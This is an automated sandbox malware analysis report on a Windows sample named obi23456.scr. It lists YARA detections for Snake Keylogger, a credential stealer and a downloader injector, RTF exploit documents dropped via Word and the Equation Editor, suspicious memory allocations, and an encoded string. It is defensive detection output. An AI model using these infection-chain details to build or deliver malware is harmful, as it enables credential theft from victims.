Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000009.00000002.374594204.0000000000780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91894CAD.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\obb.doc.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\riell.top.url			Jump to behavior

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\obi23456.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Process Stats: CPU usage > 49%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 9_2_0026425F	9_2_0026425F
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C5038	10_2_001C5038
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C3065	10_2_001C3065
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C3891	10_2_001C3891
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C78C1	10_2_001C78C1
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C2910	10_2_001C2910
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C4130	10_2_001C4130
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001CD1D8	10_2_001CD1D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C5B18	10_2_001C5B18
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C3B72	10_2_001C3B72
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C2BF1	10_2_001C2BF1
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C844D	10_2_001C844D
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C8CB2	10_2_001C8CB2
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C35B0	10_2_001C35B0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C3E50	10_2_001C3E50
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001CC750	10_2_001CC750
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C6740	10_2_001C6740
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C7000	10_2_001C7000
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C6BA0	10_2_001C6BA0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C7460	10_2_001C7460
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001CC740	10_2_001CC740
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001CBFC8	10_2_001CBFC8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001CBFC5	10_2_001CBFC5
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FF460	10_2_003FF460
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FD4E0	10_2_003FD4E0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FE178	10_2_003FE178
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FEE10	10_2_003FEE10
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F5E58	10_2_003F5E58
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FDB30	10_2_003FDB30
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FE7C0	10_2_003FE7C0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F443C	10_2_003F443C
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F1028	10_2_003F1028
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FC028	10_2_003FC028
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F1018	10_2_003F1018
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F1471	10_2_003F1471
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F9468	10_2_003F9468
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F9459	10_2_003F9459
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F4448	10_2_003F4448
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F6CBC	10_2_003F6CBC
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F48A0	10_2_003F48A0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F4890	10_2_003F4890
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F1480	10_2_003F1480
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FC480	10_2_003FC480
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F4CF8	10_2_003F4CF8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F4CF0	10_2_003F4CF0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F98E8	10_2_003F98E8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F18D8	10_2_003F18D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FC8D8	10_2_003FC8D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F18C9	10_2_003F18C9
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F6CC8	10_2_003F6CC8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F1D30	10_2_003F1D30
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F1D20	10_2_003F1D20
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F2178	10_2_003F2178
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F5150	10_2_003F5150
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F9D40	10_2_003F9D40
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F5140	10_2_003F5140
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F55A8	10_2_003F55A8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FA198	10_2_003FA198
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F5598	10_2_003F5598
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F2188	10_2_003F2188
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FA188	10_2_003FA188
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F59F8	10_2_003F59F8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FA5F0	10_2_003FA5F0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FA5E1	10_2_003FA5E1
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F25E0	10_2_003F25E0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F25D1	10_2_003F25D1
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F2A38	10_2_003F2A38
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FAA38	10_2_003FAA38
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F2A28	10_2_003F2A28
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F7A10	10_2_003F7A10
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F5A00	10_2_003F5A00
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FAA48	10_2_003FAA48
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FAEA0	10_2_003FAEA0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F7698	10_2_003F7698
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F2E90	10_2_003F2E90
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FAE90	10_2_003FAE90
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F2E81	10_2_003F2E81
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F32E8	10_2_003F32E8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F32D9	10_2_003F32D9
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F3738	10_2_003F3738
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F0320	10_2_003F0320
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FB320	10_2_003FB320
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FB311	10_2_003FB311
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F0310	10_2_003F0310
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F8708	10_2_003F8708
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F0778	10_2_003F0778
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FB778	10_2_003FB778
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F0768	10_2_003F0768
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FB767	10_2_003FB767
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F3740	10_2_003F3740
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F3B98	10_2_003F3B98
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F3B88	10_2_003F3B88
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F3FF0	10_2_003F3FF0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F3FED	10_2_003F3FED
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F0BD0	10_2_003F0BD0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FBBD0	10_2_003FBBD0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F0BC4	10_2_003F0BC4
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FBBC1	10_2_003FBBC1
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_00590040	10_2_00590040
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_00590CD8	10_2_00590CD8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_00590690	10_2_00590690
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_00590006	10_2_00590006

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Yara signature match

Source: 9.2.obi23456.scr.31b7b70.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.780000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.780000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.21b9714.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000009.00000002.374594204.0000000000780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91894CAD.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, zi--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, zi--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, zi--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, zi--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, ----.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.obi23456.scr.780000.2.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 9.2.obi23456.scr.780000.2.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'

Source: classification engine

